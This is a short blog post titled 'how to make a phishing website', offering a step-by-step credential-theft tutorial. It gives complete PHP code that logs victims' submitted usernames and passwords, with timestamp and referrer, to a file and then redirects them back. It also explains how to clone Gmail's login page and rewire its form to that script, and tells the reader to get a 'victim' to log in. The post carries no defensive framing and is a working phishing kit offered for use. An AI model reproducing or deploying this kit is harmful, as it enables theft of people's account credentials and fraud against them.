Wireless Army
This is a blog / tips and tricks website for web developers and security researchers.
follow us in feedly


how to make a phishing website
by admin
 at 2017-04-19 20:06:00.


we need to create 2 files. 1 is hack.php you can copy and past below and 1 empty file called phish.log

<?php
$ref = $_SERVER['HTTP_REFERER'];
$today = date("F j, Y, g:i a");
if (isset($_POST['name']) && !empty($_POST['name'])) {
    $nam = stripslashes($_POST['name']);
    $pas = stripslashes($_POST['pass']);
    $nam = htmlspecialchars($nam, ENT_QUOTES);
    $pas = htmlspecialchars($pas, ENT_QUOTES);
    $content = $today . "  --  " . $ref . "  --  " . $nam . "  --  " . $pas;
    $filed = @fopen("phish.log", "a+");
    @fwrite($filed, "$content\n");
    @fclose($filed);
}
?>
<html><head>
<script type="text/javascript">
function goBack()
{
window.history.back()
}
</script>
</head>
<body onload="goBack()">
</body></html>

how we can go to gmail.com and press control (command on mac) and s to save the page.
now we can open the file.htm with notepad and find the <form and on the same line change the action to hack.php.
Then you can find the inputes for email and password and change the name to name for the email input and pass for the password input.
now all you need to do is to make sure that your victim opens that page and trys to login.